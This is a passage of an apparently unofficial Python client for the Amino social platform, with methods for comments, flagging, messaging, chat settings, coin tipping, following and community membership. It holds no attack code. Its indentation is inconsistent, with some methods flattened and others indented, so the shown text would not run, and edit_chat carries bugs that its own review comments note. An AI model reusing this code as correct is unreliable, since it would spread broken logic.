else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of an User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.src.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
    def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
        """
        Flag a User, Blog or Wiki.

        Exactly one of userId / blogId / wikiId must be supplied.

        **Parameters**
            - **reason** : Reason of the Flag.
            - **flagType** : Type of the Flag.
            - **userId** : ID of the User.
            - **blogId** : ID of the Blog.
            - **wikiId** : ID of the Wiki.
            - *asGuest* : Execute as a Guest.

        **Returns**
            - **Success** : 200 (int)
            - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
        """
        if reason is None: raise exceptions.ReasonNeeded
        if flagType is None: raise exceptions.FlagTypeNeeded
        data = {
            "flagType": flagType,
            "message": reason,
            "timestamp": int(timestamp() * 1000)
        }
        # objectType encodes the flagged entity's kind: 0 = user, 1 = blog, 2 = wiki.
        if userId:
            data["objectId"] = userId
            data["objectType"] = 0
        elif blogId:
            data["objectId"] = blogId
            data["objectType"] = 1
        elif wikiId:
            data["objectId"] = wikiId
            data["objectType"] = 2
        else: raise exceptions.SpecifyType
        # Guest flags go through a separate "g-flag" endpoint.
        if asGuest: flg = "g-flag"
        else: flg = "flag"
        data = json.dumps(data)
        response = requests.post(f"{self.api}/g/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
        else: return response.status_code
    def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
        """
        Send a Message to a Chat.

        **Parameters**
            - **message** : Message to be sent
            - **chatId** : ID of the Chat.
            - **file** : File to be sent.
            - **fileType** : Type of the file.
                - ``audio``, ``image``, ``gif``
            - **messageType** : Type of the Message.
            - **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
            - **replyTo** : Message ID to reply to.
            - **stickerId** : Sticker ID to be sent.
            - **embedTitle** : Title of the Embed.
            - **embedContent** : Content of the Embed.
            - **embedLink** : Link of the Embed.
            - **embedImage** : Image of the Embed.
            - **embedId** : ID of the Embed.

        **Returns**
            - **Success** : 200 (int)
            - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
        """
        # Strip "<$"/"$>" markers from plain text messages; skipped when a file
        # is attached (the text becomes irrelevant — content is cleared below).
        if message is not None and file is None:
            message = message.replace("<$", "").replace("$>", "")
        mentions = []
        if mentionUserIds:
            for mention_uid in mentionUserIds:
                mentions.append({"uid": mention_uid})
        if embedImage:
            # Upload first, then reference the media in the attachedObject's
            # mediaList; 100 appears to be the image media-type code used
            # elsewhere in this file.
            embedImage = [[100, self.upload_media(embedImage, "image"), None]]
        data = {
            "type": messageType,
            "content": message,
            "clientRefId": int(timestamp() / 10 % 1000000000),
            "attachedObject": {
                "objectId": embedId,
                "objectType": embedType,
                "link": embedLink,
                "title": embedTitle,
                "content": embedContent,
                "mediaList": embedImage
            },
            "extensions": {"mentionedArray": mentions},
            "timestamp": int(timestamp() * 1000)
        }
        if replyTo: data["replyMessageId"] = replyTo
        if stickerId:
            # A sticker replaces any text content; type 3 = sticker message.
            data["content"] = None
            data["stickerId"] = stickerId
            data["type"] = 3
        if file:
            # File attachments also clear text content and are sent base64-inline.
            data["content"] = None
            if fileType == "audio":
                data["type"] = 2
                data["mediaType"] = 110
            elif fileType == "image":
                data["mediaType"] = 100
                data["mediaUploadValueContentType"] = "image/jpg"
                data["mediaUhqEnabled"] = True
            elif fileType == "gif":
                data["mediaType"] = 100
                data["mediaUploadValueContentType"] = "image/gif"
                data["mediaUhqEnabled"] = True
            else: raise exceptions.SpecifyType
            data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
        data = json.dumps(data)
        response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
        else: return response.status_code
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
    def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
        """
        Edit a Chat's settings.

        Each optional flag triggers its own API call; the collected status codes
        (or CheckException results) for every call made are returned as a list,
        with the final chat-metadata update appended last.

        **Parameters**
            - **chatId** : ID of the Chat.
            - **title** : Title of the Chat.
            - **content** : Content of the Chat.
            - **icon** : Icon of the Chat.
            - **backgroundImage** : Url of the Background Image of the Chat.
            - **announcement** : Announcement of the Chat.
            - **pinAnnouncement** : If the Chat Announcement should Pinned or not.
            - **coHosts** : List of User IDS to be Co-Host.
            - **keywords** : List of Keywords of the Chat.
            - **viewOnly** : If the Chat should be on View Only or not.
            - **canTip** : If the Chat should be Tippable or not.
            - **canInvite** : If the Chat should be Invitable or not.
            - **fansOnly** : If the Chat should be Fans Only or not.
            - **publishToGlobal** : If the Chat should show on Public Chats or not.
            - **doNotDisturb** : If the Chat should Do Not Disturb or not.
            - **pinChat** : If the Chat should Pinned or not.

        **Returns**
            - **Success** : list of 200 (int) per sub-request
            - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
        """
        data = {"timestamp": int(timestamp() * 1000)}
        if title: data["title"] = title
        if content: data["content"] = content
        if icon: data["icon"] = icon
        if keywords: data["keywords"] = keywords
        # NOTE(review): each of these overwrites "extensions" entirely, so only
        # the last one supplied (announcement / pinAnnouncement / fansOnly) survives.
        if announcement: data["extensions"] = {"announcement": announcement}
        if pinAnnouncement: data["extensions"] = {"pinAnnouncement": pinAnnouncement}
        if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
        # NOTE(review): the publishToGlobal mapping looks inverted (True -> 0),
        # and the "not publishToGlobal" branch also fires when the parameter is
        # left as None — confirm against the API before changing.
        if publishToGlobal: data["publishToGlobal"] = 0
        if not publishToGlobal: data["publishToGlobal"] = 1
        # Collected results of every sub-request issued below.
        res = []
        if doNotDisturb is not None:
            # alertOption 2 = do-not-disturb on, 1 = off. This reassigns `data`
            # to a JSON string; later branches that reference `data` see this value.
            if doNotDisturb:
                data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
            if not doNotDisturb:
                data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
        if pinChat is not None:
            if pinChat:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
            if not pinChat:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
        if backgroundImage is not None:
            data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
            response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
            if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
            else: res.append(response.status_code)
        if coHosts is not None:
            data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
            response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
            if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
            else: res.append(response.status_code)
        if viewOnly is not None:
            if viewOnly:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
            if not viewOnly:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
        if canInvite is not None:
            if canInvite:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
            if not canInvite:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
        if canTip is not None:
            if canTip:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
            if not canTip:
                response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
                if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
                else: res.append(response.status_code)
        # NOTE(review): if any branch above ran, `data` may already be a JSON
        # string here, so this dumps a string rather than the metadata dict —
        # confirm whether the final metadata update still applies in that case.
        data = json.dumps(data)
        response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
        else: res.append(response.status_code)
        return res
def visit(self, userId: str):
"""
Visit an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = requests.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def follow(self, userId: [str, list]):
"""
Follow an User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if isinstance(userId, str):
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unfollow(self, userId: str):
"""
Unfollow an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def block(self, userId: str):
"""
Block an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unblock(self, userId: str):
"""
Unblock an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def join_community(self, comId: str, invitationId: str = None):
    """
    Join a Community.
    **Parameters**
        - **comId** : ID of the Community.
        - **invitationId** : ID of the Invitation Code.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    payload = {"timestamp": int(timestamp() * 1000)}
    if invitationId:
        payload["invitationId"] = invitationId
    data = json.dumps(payload)
    response = requests.post(
        f"{self.api}/x{comId}/s/community/join",
        data=data,
        headers=self.parse_headers(data=data),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))

def request_join_community(self, comId: str, message: str = None):
    """
    Request to join a Community.
    **Parameters**
        - **comId** : ID of the Community.
        - **message** : Message to be sent.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
    response = requests.post(
        f"{self.api}/x{comId}/s/community/membership-request",
        data=data,
        headers=self.parse_headers(data=data),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))

def leave_community(self, comId: str):
    """
    Leave a Community.
    **Parameters**
        - **comId** : ID of the Community.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.post(
        f"{self.api}/x{comId}/s/community/leave",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
    """
    Flag a Community.
    **Parameters**
        - **comId** : ID of the Community.
        - **reason** : Reason of the Flag.
        - **flagType** : Type of Flag.
        - **isGuest** : Use the guest flag endpoint instead of the member one.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    if reason is None:
        raise exceptions.ReasonNeeded
    if flagType is None:
        raise exceptions.FlagTypeNeeded
    data = json.dumps({
        "objectId": comId,
        "objectType": 16,
        "flagType": flagType,
        "message": reason,
        "timestamp": int(timestamp() * 1000)
    })
    # Guests and members report through different endpoints.
    flg = "g-flag" if isGuest else "flag"
    response = requests.post(
        f"{self.api}/x{comId}/s/{flg}",
        data=data,
        headers=self.parse_headers(data=data),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
    """
    Edit account's Profile.
    **Parameters**
        - **nickname** : Nickname of the Profile.
        - **content** : Biography of the Profile.
        - **icon** : Icon of the Profile.
        - **backgroundImage** : Url of the Background Picture of the Profile.
        - **backgroundColor** : Hexadecimal Background Color of the Profile.
        - **defaultBubbleId** : Chat bubble ID.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = {
        "address": None,
        "latitude": 0,
        "longitude": 0,
        "mediaList": None,
        "eventSource": "UserProfileView",
        "timestamp": int(timestamp() * 1000)
    }
    if nickname: data["nickname"] = nickname
    if icon: data["icon"] = self.upload_media(icon, "image")
    if content: data["content"] = content
    # Bug fix: the original reassigned the whole "extensions" dict for each
    # option, so passing e.g. backgroundColor together with defaultBubbleId
    # silently dropped all but the last one. Build it incrementally instead.
    extensions = {}
    if backgroundColor:
        extensions.setdefault("style", {})["backgroundColor"] = backgroundColor
    if backgroundImage:
        extensions.setdefault("style", {})["backgroundMediaList"] = [[100, backgroundImage, None, None, None]]
    if defaultBubbleId:
        extensions["defaultBubbleId"] = defaultBubbleId
    if extensions:
        data["extensions"] = extensions
    data = json.dumps(data)
    response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
    else: return response.status_code
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
    """
    Edit account's Privacy Status.
    **Parameters**
        - **isAnonymous** : If visibility should be Anonymous or not.
        - **getNotifications** : If account should get new Visitors Notifications.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = {
        "timestamp": int(timestamp() * 1000),
        # privacyMode: 1 = visible, 2 = anonymous.
        "privacyMode": 2 if isAnonymous else 1,
        # Bug fix: the original wrote "privacyMode" here when
        # getNotifications was True, clobbering the anonymity setting and
        # never actually enabling notifications.
        "notificationStatus": 1 if getNotifications else 2,
    }
    data = json.dumps(data)
    response = requests.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
    else: return response.status_code
def set_amino_id(self, aminoId: str):
    """
    Edit account's Amino ID.
    **Parameters**
        - **aminoId** : Amino ID of the Account.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
    response = requests.post(
        f"{self.api}/g/s/account/change-amino-id",
        headers=self.parse_headers(data=data),
        data=data,
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def get_linked_communities(self, userId: str):
    """
    Get a List of Linked Communities of an User.
    **Parameters**
        - **userId** : ID of the User.
    **Returns**
        - **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/user-profile/{userId}/linked-community",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
    return exceptions.CheckException(json.loads(response.text))

def get_unlinked_communities(self, userId: str):
    """
    Get a List of Unlinked Communities of an User.
    **Parameters**
        - **userId** : ID of the User.
    **Returns**
        - **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    # Same endpoint as get_linked_communities; presumably the response body
    # carries both "linkedCommunityList" and "unlinkedCommunityList" keys.
    response = requests.get(
        f"{self.api}/g/s/user-profile/{userId}/linked-community",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
    return exceptions.CheckException(json.loads(response.text))
def reorder_linked_communities(self, comIds: list):
    """
    Reorder List of Linked Communities.
    **Parameters**
        - **comIds** : IDS of the Communities.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
    response = requests.post(
        f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder",
        headers=self.parse_headers(data=data),
        data=data,
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))

def add_linked_community(self, comId: str):
    """
    Add a Linked Community on your profile.
    **Parameters**
        - **comId** : ID of the Community.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.post(
        f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))

def remove_linked_community(self, comId: str):
    """
    Remove a Linked Community on your profile.
    **Parameters**
        - **comId** : ID of the Community.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.delete(
        f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
    """
    Comment on a User's Wall, Blog or Wiki.
    **Parameters**
        - **message** : Message to be sent.
        - **userId** : ID of the User. (for Walls)
        - **blogId** : ID of the Blog. (for Blogs)
        - **wikiId** : ID of the Wiki. (for Wikis)
        - **replyTo** : ID of the Comment to Reply to.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    if message is None:
        raise exceptions.MessageNeeded
    payload = {
        "content": message,
        "stickerId": None,
        "type": 0,
        "timestamp": int(timestamp() * 1000)
    }
    if replyTo:
        payload["respondTo"] = replyTo
    # Exactly one target kind is used; precedence is user > blog > wiki.
    if userId:
        payload["eventSource"] = "UserProfileView"
        url = f"{self.api}/g/s/user-profile/{userId}/g-comment"
    elif blogId:
        payload["eventSource"] = "PostDetailView"
        url = f"{self.api}/g/s/blog/{blogId}/g-comment"
    elif wikiId:
        payload["eventSource"] = "PostDetailView"
        url = f"{self.api}/g/s/item/{wikiId}/g-comment"
    else:
        raise exceptions.SpecifyType
    data = json.dumps(payload)
    response = requests.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
    """
    Delete a Comment on a User's Wall, Blog or Wiki.
    **Parameters**
        - **commentId** : ID of the Comment.
        - **userId** : ID of the User. (for Walls)
        - **blogId** : ID of the Blog. (for Blogs)
        - **wikiId** : ID of the Wiki. (for Wikis)
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    # Exactly one target kind is used; precedence is user > blog > wiki.
    if userId:
        url = f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}"
    elif blogId:
        url = f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}"
    elif wikiId:
        url = f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}"
    else:
        raise exceptions.SpecifyType
    response = requests.delete(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def like_blog(self, blogId: [str, list] = None, wikiId: str = None):
    """
    Like a Blog, Multiple Blogs or a Wiki.
    **Parameters**
        - **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
        - **wikiId** : ID of the Wiki. (for Wikis)
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    payload = {
        "value": 4,
        "timestamp": int(timestamp() * 1000)
    }
    if blogId:
        if isinstance(blogId, str):
            # Single blog vote.
            payload["eventSource"] = "UserProfileView"
            url = f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2"
        elif isinstance(blogId, list):
            # Batch vote on several blogs at once.
            payload["targetIdList"] = blogId
            url = f"{self.api}/g/s/feed/g-vote"
        else:
            raise exceptions.WrongType(type(blogId))
    elif wikiId:
        payload["eventSource"] = "PostDetailView"
        url = f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2"
    else:
        raise exceptions.SpecifyType()
    data = json.dumps(payload)
    response = requests.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def unlike_blog(self, blogId: str = None, wikiId: str = None):
    """
    Remove a like from a Blog or Wiki.
    **Parameters**
        - **blogId** : ID of the Blog. (for Blogs)
        - **wikiId** : ID of the Wiki. (for Wikis)
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    if blogId:
        url = f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView"
    elif wikiId:
        url = f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView"
    else:
